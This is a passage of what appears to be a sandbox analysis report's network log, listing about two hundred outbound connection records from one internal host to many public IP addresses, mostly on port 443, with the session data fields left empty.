                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18989192.168.2.1350700121.84.167.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18990192.168.2.1342210198.59.198.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18991192.168.2.1348128166.7.111.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18992192.168.2.1354282145.36.78.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18993192.168.2.1350700163.213.214.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18994192.168.2.136013443.187.46.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18995192.168.2.1351640219.60.28.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18996192.168.2.1346640107.151.2.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18997192.168.2.1352830218.133.186.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18998192.168.2.1350462105.81.227.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18999192.168.2.135572287.85.247.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19000192.168.2.1354632189.152.200.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19001192.168.2.13584608.9.255.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19002192.168.2.1352670139.242.96.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19003192.168.2.133829854.214.211.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19004192.168.2.1357188203.211.232.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19005192.168.2.1336154178.117.9.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19006192.168.2.1360076187.84.109.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19007192.168.2.133542484.211.65.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19008192.168.2.133336480.20.64.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19009192.168.2.134644282.148.226.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19010192.168.2.1340806183.146.104.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19011192.168.2.1338420195.255.186.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19012192.168.2.1356472148.107.15.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19013192.168.2.1351342223.238.169.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19014192.168.2.1338372199.21.52.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19015192.168.2.1339172107.189.190.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19016192.168.2.1351354167.173.183.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19017192.168.2.134116848.225.57.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19018192.168.2.1337886169.9.60.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19019192.168.2.135628867.252.163.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19020192.168.2.1336510122.122.57.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19021192.168.2.1356636171.41.27.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19022192.168.2.134511240.82.213.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19023192.168.2.1349954141.75.125.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19024192.168.2.1354870145.141.195.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19025192.168.2.135423696.57.78.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19026192.168.2.1333422220.205.2.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19027192.168.2.135604432.5.217.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19028192.168.2.1347140189.25.114.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19029192.168.2.1353742136.149.83.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19030192.168.2.1337042216.235.231.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19031192.168.2.1349138101.118.83.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19032192.168.2.1349694198.94.123.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19033192.168.2.133853897.81.127.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19034192.168.2.134933895.2.111.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19035192.168.2.135838831.123.2.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19036192.168.2.1335684195.76.219.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19037192.168.2.1354538189.232.234.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19038192.168.2.1360582111.96.159.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19039192.168.2.135146477.120.248.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19040192.168.2.1336184135.139.100.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19041192.168.2.1347434178.18.17.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19042192.168.2.1358180210.178.181.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19043192.168.2.1336520137.71.230.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19044192.168.2.1334552168.249.173.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19045192.168.2.134704483.105.158.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19046192.168.2.133689057.253.175.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19047192.168.2.1341896165.27.50.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19048192.168.2.1334886107.75.57.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19049192.168.2.13468549.252.6.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19050192.168.2.1339860185.68.36.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19051192.168.2.1337606146.67.141.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19052192.168.2.1346872115.20.56.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19053192.168.2.135292068.248.177.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19054192.168.2.1339032187.34.39.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19055192.168.2.135048667.133.158.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19056192.168.2.134090679.174.16.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19057192.168.2.133816887.110.52.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19058192.168.2.135295895.208.148.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19059192.168.2.134945687.52.7.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19060192.168.2.1344434171.243.81.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19061192.168.2.1339266114.61.39.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19062192.168.2.1351210202.251.131.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19063192.168.2.134275413.8.65.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19064192.168.2.1354546147.148.4.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19065192.168.2.1348128140.6.8.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19066192.168.2.1340620212.153.91.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19067192.168.2.134085479.44.208.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19068192.168.2.1357130207.131.163.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19069192.168.2.133648424.14.102.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19070192.168.2.1343180106.216.179.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19071192.168.2.1333966163.87.150.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19072192.168.2.1344984136.168.254.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19073192.168.2.135966669.146.22.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19074192.168.2.134846276.180.36.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19075192.168.2.135386865.220.245.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19076192.168.2.135560463.136.9.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19077192.168.2.1334468161.38.75.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19078192.168.2.133816451.22.201.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19079192.168.2.1333842217.62.53.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19080192.168.2.1337796124.58.186.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19081192.168.2.1356412142.109.136.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19082192.168.2.1332844111.142.210.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19083192.168.2.1348034194.131.202.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19084192.168.2.1356490178.42.128.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19085192.168.2.134747458.118.224.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19086192.168.2.1359606216.10.209.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19087192.168.2.135113277.18.243.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19088192.168.2.1358574123.157.86.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19089192.168.2.1351566139.116.196.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19090192.168.2.134981885.10.79.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19091192.168.2.1340958185.236.229.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19092192.168.2.135747238.149.91.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19093192.168.2.1344942156.55.161.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19094192.168.2.1349874115.221.180.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19095192.168.2.1355972126.106.162.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19096192.168.2.1335400158.14.237.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19097192.168.2.1342954170.117.123.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19098192.168.2.1348258106.200.209.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19099192.168.2.1356200132.230.153.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19100192.168.2.135234248.80.42.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19101192.168.2.1339536160.149.63.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19102192.168.2.135707242.206.90.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19103192.168.2.1353204159.243.185.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19104192.168.2.1352004170.176.150.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19105192.168.2.134445247.118.61.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19106192.168.2.1337728104.225.175.48080
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19107192.168.2.1340506133.213.46.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19108192.168.2.1336098206.154.228.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19109192.168.2.1333364174.65.89.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19110192.168.2.135662845.252.196.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19111192.168.2.133421498.239.128.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19112192.168.2.1359674198.166.39.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19113192.168.2.1358700147.118.61.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19114192.168.2.1350006164.104.141.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19115192.168.2.1341190205.43.244.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19116192.168.2.1346958162.19.18.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19117192.168.2.1346746163.248.74.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19118192.168.2.134075635.177.208.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19119192.168.2.134962049.14.215.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19120192.168.2.1347290137.10.230.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19121192.168.2.1359226223.230.66.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19122192.168.2.1338238122.167.161.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19123192.168.2.134766444.86.207.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19124192.168.2.133682073.46.144.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19125192.168.2.134574058.130.159.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19126192.168.2.1358210152.158.186.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19127192.168.2.1333836182.169.192.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19128192.168.2.13356285.73.199.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19129192.168.2.134297225.31.43.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19130192.168.2.134064227.180.80.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19131192.168.2.1343196207.233.85.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19132192.168.2.1348638210.109.166.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19133192.168.2.1344030165.7.237.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19134192.168.2.135725686.101.219.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19135192.168.2.1360862173.149.103.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19136192.168.2.1342440133.90.23.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19137192.168.2.134157264.164.172.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19138192.168.2.134949687.71.115.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19139192.168.2.133393838.6.234.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19140192.168.2.134809835.34.217.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19141192.168.2.1341892197.158.241.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19142192.168.2.135671460.242.154.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19143192.168.2.1344070223.247.153.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19144192.168.2.134758660.145.62.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19145192.168.2.1357410208.195.189.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19146192.168.2.1338002167.219.204.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19147192.168.2.135188886.92.196.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19148192.168.2.1339658106.167.206.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19149192.168.2.133647849.250.86.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19150192.168.2.135478293.237.162.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19151192.168.2.1352858153.74.180.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19152192.168.2.135737088.92.162.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19153192.168.2.135849442.28.99.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19154192.168.2.1341566115.181.143.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19155192.168.2.1357050153.24.79.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19156192.168.2.134179469.136.146.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19157192.168.2.1337354108.41.104.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19158192.168.2.1348862221.190.160.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19159192.168.2.134045289.46.183.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19160192.168.2.133708853.193.4.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19161192.168.2.134615499.55.214.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19162192.168.2.1352180133.109.86.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19163192.168.2.133546644.199.3.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19164192.168.2.1343114195.209.105.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19165192.168.2.134271849.73.100.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19166192.168.2.1358084172.162.173.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19167192.168.2.1336446211.96.101.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19168192.168.2.1348422133.49.19.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19169192.168.2.1337510132.87.224.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19170192.168.2.135367620.100.106.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19171192.168.2.1358962146.115.3.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19172192.168.2.1344232155.134.98.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19173192.168.2.1337716220.229.196.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19174192.168.2.1343704147.33.222.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19175192.168.2.1340324140.11.253.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19176192.168.2.1348628174.37.158.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19177192.168.2.1358628192.120.169.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19178192.168.2.1342520108.122.153.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19179192.168.2.134507219.143.198.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19180192.168.2.1353598184.212.54.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19181192.168.2.1333730110.248.58.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19182192.168.2.1333270132.160.76.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19183192.168.2.1341976137.73.178.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19184192.168.2.1346090169.48.232.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19185192.168.2.1334092213.33.240.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19186192.168.2.1346234182.220.211.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19187192.168.2.1358706138.177.219.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19188192.168.2.133604646.222.140.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19189192.168.2.1339590194.118.254.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19190192.168.2.133661037.122.219.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19191192.168.2.133295058.14.167.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19192192.168.2.135049458.32.200.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19193192.168.2.1335512162.152.64.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19194192.168.2.133817873.78.14.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19195192.168.2.13404382.123.28.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19196192.168.2.135581452.89.102.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19197192.168.2.1335226118.243.175.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19198192.168.2.13529041.185.136.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19199192.168.2.1339628164.32.96.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19200192.168.2.135632094.41.103.96443
                                                  TimestampBytes transferredDirectionData


